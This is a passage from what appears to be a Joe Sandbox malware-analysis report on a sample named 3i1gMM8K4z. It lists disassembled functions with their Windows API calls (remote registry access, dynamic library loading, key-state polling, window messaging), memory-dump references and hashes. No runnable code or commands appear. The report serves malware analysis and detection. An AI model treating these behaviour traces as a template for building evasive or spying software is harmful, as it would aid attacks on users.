                                                                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F5ED6A
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F5EDEB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2364364464-0
                                                                                                                            • Opcode ID: 78dcd0cb06f3839619c3b359fd531343ebb9da1fae97a17035c314c27f1957ac
                                                                                                                            • Instruction ID: 2ea61e42f530ed6fda0c53de252c09a1d896e9f7acc9f802ff4dffe489fb35a6
                                                                                                                            • Opcode Fuzzy Hash: 78dcd0cb06f3839619c3b359fd531343ebb9da1fae97a17035c314c27f1957ac
                                                                                                                            • Instruction Fuzzy Hash: B5817371600304AFD764EF29CC46F6AB7E5AF44720F04881DF999EB292D7B0AD44CB96
                                                                                                                            Function 00F60037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F60E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F600FD
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F6013C
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F60183
                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00F601AF
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F601BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3440857362-0
                                                                                                                            • Opcode ID: 3114d67f689a04e0e5a9ccf517ccd3686e9161edc356020ebc79bae11830590a
                                                                                                                            • Instruction ID: 6394803becc9bf275dbf08b0b0515cc91dfaa9a320eb8c0b7410b2bc7493ab21
                                                                                                                            • Opcode Fuzzy Hash: 3114d67f689a04e0e5a9ccf517ccd3686e9161edc356020ebc79bae11830590a
                                                                                                                            • Instruction Fuzzy Hash: DD517A71608248AFC704EF58DC81E6BB7E8FF85314F14892DF596972A2DB31E904DB52
                                                                                                                            Function 00F5D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F5D927
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F5D9AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F5D9C6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F5DA07
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F5DA21
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F47896,?,?,00000000), ref: 00EE5A2C
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F47896,?,?,00000000,?,?), ref: 00EE5A50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 327935632-0
                                                                                                                            • Opcode ID: 4a71accb33b169865e348ac912228ebc0e7225bffb495f38ca48f27376bf8671
                                                                                                                            • Instruction ID: 3d303ff329f83ac72353d394ba567fd7448539a048c2af383af93be8fcea7266
                                                                                                                            • Opcode Fuzzy Hash: 4a71accb33b169865e348ac912228ebc0e7225bffb495f38ca48f27376bf8671
                                                                                                                            • Instruction Fuzzy Hash: 1D514636A01249DFCB10EFA8C4849ADB7F4FF09325B048069E959AB322D731ED49DF90
                                                                                                                            Function 00F4E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F4E61F
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F4E648
                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F4E687
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F4E6AC
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F4E6B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1389676194-0
                                                                                                                            • Opcode ID: 22b21eda25c412c35b4affaa784e14ffab25e0edebb4a84b1998619fe943a8cc
                                                                                                                            • Instruction ID: 9acf010585895ca85aa86f9aee73dd80d9672db473528af5d81f8e26fe66f6c5
                                                                                                                            • Opcode Fuzzy Hash: 22b21eda25c412c35b4affaa784e14ffab25e0edebb4a84b1998619fe943a8cc
                                                                                                                            • Instruction Fuzzy Hash: 0C510735A00249DFCB05EF65C981AAEBBF5EF09314F1480A9E859AB362CB31ED11DF54
                                                                                                                            Function 00F6A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0c25dedeef390e77655ab67e5074994d473147ba5de8c3ede9d3227135748c7e
                                                                                                                            • Instruction ID: 6d82792d466f664f38d3fd62b338a489d2da4efba722f618e0e4ba02e6ba041d
                                                                                                                            • Opcode Fuzzy Hash: 0c25dedeef390e77655ab67e5074994d473147ba5de8c3ede9d3227135748c7e
                                                                                                                            • Instruction Fuzzy Hash: 35418275D04108ABD710DF28DC48FA9BBA8EB0A320F154265E926B72E1CB709D55FE51
                                                                                                                            Function 00EE2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 00EE2357
                                                                                                                            • ScreenToClient.USER32(00FA57B0,?), ref: 00EE2374
                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00EE2399
                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00EE23A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4210589936-0
                                                                                                                            • Opcode ID: f58b8b8414fef0a169628752a7d0245a5464d3456154e2c9abc4b9fa467b23d0
                                                                                                                            • Instruction ID: 92975408f09490e8ecfe97a5047cb9260bfe7528229ac1431a0a7a51666109ac
                                                                                                                            • Opcode Fuzzy Hash: f58b8b8414fef0a169628752a7d0245a5464d3456154e2c9abc4b9fa467b23d0
                                                                                                                            • Instruction Fuzzy Hash: 3E417135A0410AFBCF159F69CC44AE9BB78FB05364F20431AF929E2290C7359D94EF91
                                                                                                                            Function 00F363AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F363E7
                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00F36433
                                                                                                                            • TranslateMessage.USER32(?), ref: 00F3645C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00F36466
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F36475
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2108273632-0
                                                                                                                            • Opcode ID: 7956eb92513c6940705b91c7d57b24657fb0253051bae7ee1abfc00104b5a1f5
                                                                                                                            • Instruction ID: c272aa8eb89cb632cb162d2ef468fa16aa492e081c00ca1f5d0dd78e04d3d1d3
                                                                                                                            • Opcode Fuzzy Hash: 7956eb92513c6940705b91c7d57b24657fb0253051bae7ee1abfc00104b5a1f5
                                                                                                                            • Instruction Fuzzy Hash: 3631B271D0064ABFDB24CFB0DC44BB67BECAB02730F148169E421C71A1E765A899FB60
                                                                                                                            Function 00F38A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F38A30
                                                                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00F38ADA
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F38AE2
                                                                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00F38AF0
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F38AF8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3382505437-0
                                                                                                                            • Opcode ID: 32ffbb2494be061f4c4355ccaf59016b0210dded14bf618b3d475a81adaccc98
                                                                                                                            • Instruction ID: fff9f63ae5663ebe8984164e8f96b62ede608a357ff9a50dffc7a9ae1d4a5da3
                                                                                                                            • Opcode Fuzzy Hash: 32ffbb2494be061f4c4355ccaf59016b0210dded14bf618b3d475a81adaccc98
                                                                                                                            • Instruction Fuzzy Hash: 2331FF71900219EBCF00CFA8D94CA9E3BB5EB04325F10822AF825E72D1C7B89915EB90
                                                                                                                            Function 00F3B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00F3B204
                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F3B221
                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F3B259
                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F3B27F
                                                                                                                            • _wcsstr.LIBCMT ref: 00F3B289
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3902887630-0
                                                                                                                            • Opcode ID: 152d2b12e94d269ec757c4cfe5ec10472f9f839be31364f38b88018d3b71ead3
                                                                                                                            • Instruction ID: 91d9fd5d5b6d406af05f14ca82b78203694d7fd4240cb71027081857063d92b8
                                                                                                                            • Opcode Fuzzy Hash: 152d2b12e94d269ec757c4cfe5ec10472f9f839be31364f38b88018d3b71ead3
                                                                                                                            • Instruction Fuzzy Hash: D621F532604205BAEB169B75DC19E7F7B98DF49730F104229F905DA1A1EFA5DC40B2A0
                                                                                                                            Function 00F6B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F6B192
                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F6B1B7
                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F6B1CF
                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00F6B1F8
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F50E90,00000000), ref: 00F6B216
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2294984445-0
                                                                                                                            • Opcode ID: b2940f0a0095afedc6f0a2d492e15ad431558611143bbe31ccff8a2b7e74bcae
                                                                                                                            • Instruction ID: 5d7bfa39af865a69e5f32b938cb0247b55b7a98b25912d95e4803eed04f3f691
                                                                                                                            • Opcode Fuzzy Hash: b2940f0a0095afedc6f0a2d492e15ad431558611143bbe31ccff8a2b7e74bcae
                                                                                                                            • Instruction Fuzzy Hash: 80215C71A10665AFCB119F38DC14A6A3BA4FB06771B154739E932D71E0E73099A0EB90
                                                                                                                            Function 00F39307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F39320
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F39352
                                                                                                                            • __itow.LIBCMT ref: 00F3936A
                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F39392
                                                                                                                            • __itow.LIBCMT ref: 00F393A3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$__itow$_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2983881199-0
                                                                                                                            • Opcode ID: 376e7d74a78e26f9ce21f8378a9ecf68d2306312c748df037ff94ddd75f99d42
                                                                                                                            • Instruction ID: f03374a6d8b75b2c99697c6111176f5fa2191c9471cf981166475a28dfd2d2bc
                                                                                                                            • Opcode Fuzzy Hash: 376e7d74a78e26f9ce21f8378a9ecf68d2306312c748df037ff94ddd75f99d42
                                                                                                                            • Instruction Fuzzy Hash: 1F210771B08208ABDB10AAA19C85EAE7BADEF48730F045025F945EB1D0D6F0CD45A7A2
                                                                                                                            Function 00F55A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsWindow.USER32(00000000), ref: 00F55A6E
                                                                                                                            • GetForegroundWindow.USER32 ref: 00F55A85
                                                                                                                            • GetDC.USER32(00000000), ref: 00F55AC1
                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00F55ACD
                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00F55B08
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4156661090-0
                                                                                                                            • Opcode ID: f6c1c74afb733aa8d05871d388b6682269f82478997a18f799a6b26e90f88f5e
                                                                                                                            • Instruction ID: 8784391f0fb75256b684a6ffc76db2d150893ad9598817da48f218dce0a9559e
                                                                                                                            • Opcode Fuzzy Hash: f6c1c74afb733aa8d05871d388b6682269f82478997a18f799a6b26e90f88f5e
                                                                                                                            • Instruction Fuzzy Hash: DB21C375A00108AFD704EF65DC94A9ABBE5EF48351F148079FD19D7362CA74AC05EB90
                                                                                                                            Function 00EE12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EE134D
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00EE135C
                                                                                                                            • BeginPath.GDI32(?), ref: 00EE1373
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00EE139C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3225163088-0
                                                                                                                            • Opcode ID: 03dbcfef238721857787685f93f49769dc552e54eedad8a11c734dc00d356ba9
                                                                                                                            • Instruction ID: 3ddeaa9b27fe75fbc4b85951d0ffcc437bf82a2fb189d7858094e42daba26470
                                                                                                                            • Opcode Fuzzy Hash: 03dbcfef238721857787685f93f49769dc552e54eedad8a11c734dc00d356ba9
                                                                                                                            • Instruction Fuzzy Hash: 482159B080064CEBDB108F26EC047AD7BB8EB11B25F144266E810A65B0D3B498D5EF90
                                                                                                                            Function 00F3BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2931989736-0
